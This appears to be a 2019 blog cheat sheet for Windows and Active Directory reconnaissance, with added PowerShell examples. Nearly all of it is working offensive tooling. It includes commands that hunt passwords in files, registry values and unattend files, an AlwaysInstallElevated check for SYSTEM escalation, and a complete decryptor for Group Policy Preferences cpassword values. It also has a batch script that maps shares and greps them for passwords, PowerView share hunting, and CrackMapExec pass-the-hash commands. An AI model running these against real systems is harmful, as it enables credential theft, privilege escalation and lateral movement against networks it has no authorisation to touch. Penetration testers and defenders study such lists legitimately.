Windows Recon (Cheat Sheet)

svch0st
2 min readJul 3, 2019


Windows OS Enumeration

net config Workstation
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
net users
ipconfig /all
route print
arp -a
netstat -ano
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
tasklist /SVC
net start
DRIVERQUERY
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
dir /s *pass* == *cred* == *vnc* == *.config* (cmd treats = as a separator, so this is four patterns in one dir call)
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
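
Added example, not part of the original cheat sheet: the two reg query lines for AlwaysInstallElevated show each hive on its own, but Windows Installer only runs an arbitrary MSI as SYSTEM when the value is 1 under both HKLM and HKCU, so the PowerShell below reads both and returns one verdict. The function names are mine; a missing key or value is treated as 0 (policy not set).

```powershell
function Get-AlwaysInstallElevatedValue {
    param([Parameter(Mandatory)][ValidateSet('HKLM', 'HKCU')][string]$Hive)
    $key = "${Hive}:\SOFTWARE\Policies\Microsoft\Windows\Installer"
    # A missing key or value means the policy was never configured, which is the
    # same as disabled, so report 0 rather than throwing.
    $item = Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }
    return [int]$item.AlwaysInstallElevated
}

function Test-AlwaysInstallElevated {
    $hklm = Get-AlwaysInstallElevatedValue -Hive HKLM
    $hkcu = Get-AlwaysInstallElevatedValue -Hive HKCU
    [PSCustomObject]@{
        HKLM        = $hklm
        HKCU        = $hkcu
        # Both the per-machine and the per-user value must be 1; one of them alone
        # does nothing, which is the mistake this check is meant to catch.
        Exploitable = ($hklm -eq 1) -and ($hkcu -eq 1)
    }
}

Test-AlwaysInstallElevated | Format-List
```

If Exploitable comes back True, any user on the box can install an .msi with SYSTEM privileges; if only one hive is set, move on.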

Find Goodies

Service Account Credentials within SYSVOL Group Policy Preferences (GPP)

findstr /S /I cpassword \\domain.com\sysvol\domain.com\policies\*.xml
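
Added example, not code from the original post: findstr above only locates cpassword attributes, the PowerShell below decrypts them. It uses the AES-256 key Microsoft published in the Group Policy Preferences specification (the reason for MS14-025), a 16-byte zero IV, and UTF-16LE plaintext. The function names, the svc_backup sample account and the temp-file path are mine; the constructed Groups.xml carries the sample cpassword value used in public gpp-decrypt write-ups, so the script runs offline, and on a real domain you point it at the SYSVOL files instead.

```powershell
# AES-256 key from Microsoft's Group Policy Preferences specification (MS-GPPREF).
$GppAesKey = [byte[]](
    0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
    0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b
)

function ConvertFrom-GppCpassword {
    param([Parameter(Mandatory)][string]$Cpassword)
    # GPP strips the trailing '=' from the base64 string; restore it before decoding.
    $padded = $Cpassword + ('=' * ((4 - ($Cpassword.Length % 4)) % 4))
    $cipher = [Convert]::FromBase64String($padded)

    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = $GppAesKey
    $aes.IV      = New-Object byte[] 16        # GPP uses an all-zero IV
    $decryptor = $aes.CreateDecryptor()
    try {
        $plain = $decryptor.TransformFinalBlock($cipher, 0, $cipher.Length)
    }
    finally {
        $decryptor.Dispose()
        $aes.Dispose()
    }
    # The password is stored as UTF-16LE.
    [System.Text.Encoding]::Unicode.GetString($plain)
}

function Get-GppCredential {
    # Walks the given preference XML files (Groups.xml, Services.xml, ScheduledTasks.xml,
    # DataSources.xml, Drives.xml) and emits every element that carries a cpassword.
    param([Parameter(Mandatory)][string[]]$Path)
    foreach ($file in $Path) {
        [xml]$doc = Get-Content -LiteralPath $file -Raw
        foreach ($node in $doc.SelectNodes('//*[@cpassword]')) {
            [PSCustomObject]@{
                File     = $file
                UserName = $node.GetAttribute('userName')   # Services/tasks use runAs or accountName instead
                NewName  = $node.GetAttribute('newName')
                Password = ConvertFrom-GppCpassword $node.GetAttribute('cpassword')
            }
        }
    }
}

# Constructed sample Groups.xml (hypothetical svc_backup account); the cpassword value
# is the sample that appears in public gpp-decrypt write-ups.
$sample = @'
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="svc_backup" changed="2014-05-13 17:00:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description="" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="svc_backup"/>
  </User>
</Groups>
'@
$tmp = Join-Path ([IO.Path]::GetTempPath()) 'Groups.xml'
Set-Content -LiteralPath $tmp -Value $sample
Get-GppCredential -Path $tmp

# Against a real domain, hand it the files findstr found under SYSVOL:
# Get-GppCredential -Path (Get-ChildItem \\domain.com\sysvol\domain.com\policies -Recurse -Include Groups.xml,Services.xml,ScheduledTasks.xml,DataSources.xml,Drives.xml).FullName
```

MS14-025 only stopped admins from writing new cpassword values; XML files created before the patch stay in SYSVOL, readable by every domain user, until someone deletes them, which is why this is still worth a look on older domains.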

Find in files and registry

findstr /snip password *.xml *.ini *.txt (quicker than below)
findstr /snip password *
dir /s *password* == *cred* == *vnc* == *.config*
dir c:\*vnc.ini /s /b

Unattended-install files that often hold a local administrator password (plaintext or base64):

c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" (autologon DefaultUserName / DefaultPassword)

GPO settings

gpresult /z
gpresult /H report.html (for pretty HTML output; /H needs an output file name)

Users, Groups and Privileges

CMD

net localgroup administrators /domain
net group "Domain Controllers" /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net user <UserName> /domain

Powershell

Get-ADDomainController -Filter * | Select-Object HostName, OperatingSystem
Get-ADFineGrainedPasswordPolicy -Filter *
Get-ADDefaultDomainPasswordPolicy
Get-ADUser <UserName> -Properties *
Get-ADUser -Filter * -Properties Name, PasswordNeverExpires | Where-Object { $_.PasswordNeverExpires -eq $true } | Select-Object DistinguishedName, Name, Enabled
Get-ADGroupMember -Identity <GroupName>
Get-ADComputer -Filter * | Select-Object Name
Get-GPO -All | Select-Object DisplayName, GpoStatus

SMB File Shares

Find Hosts with SMB Open (Nmap)

nmap -vv -Pn -n -p 445 10.10.10.0/24 -oA smb_host

Pull the hosts with 445/tcp open out of the .gnmap output:

grep open smb_host.gnmap | awk '{print $2}' > smb_up.txt && cat smb_up.txt

Find Open Shares (PowerView)

Invoke-ShareFinder -HostList smb_up.txt -NoPing -CheckShareAccess | Out-File -Encoding ascii found_shares.txt

If you want to remove the extra formatting of the output in found_shares.txt, you can run the following. Write to a temporary file first: redirecting grep straight back into found_shares.txt truncates the file before grep reads it.

grep -oP "(\s).?\-.*" found_shares.txt > found_shares.tmp && mv found_shares.tmp found_shares.txt

Permissions (PowerView)

Invoke-FileFinder -ShareList .\found_shares.txt | ForEach-Object {Get-Acl $_.FullName} | Select-Object -Property Path,Owner,Group,AccessToString | Export-Csv Permissions.csv

Find Interesting file names from Share list (PowerView)

Invoke-FileFinder -ShareList found_shares.txt -Terms confidential, password -Verbose | ForEach-Object {Get-Acl $_.FullName} | Format-List

Batch script to search for passwords inside files on the open shares found in the steps above.

@echo off
REM Reads one \\host\share per line from found_shares.txt, maps it to Z:,
REM and greps the whole share for "password", appending hits to the output file.
if not exist "C:\Temp" mkdir "C:\Temp"
for /F "tokens=*" %%a in (found_shares.txt) do (
    C:
    net use Z: /delete /y >nul 2>&1
    net use Z: "%%a"
    echo %%a
    echo %%a >> "C:\Temp\output_file.txt"
    REM Only search when the mapping actually succeeded
    if exist Z:\ (
        Z:
        cd \
        findstr /snip password * >> "C:\Temp\output_file.txt"
    )
)
C:
net use Z: /delete /y >nul 2>&1

Use password or hash for authentication (using CrackMapExec)

cme smb 192.168.1.0/24 -u UserName -H 'LM:NT'
cme smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE'

Lists

https://github.com/danielmiessler/SecLists
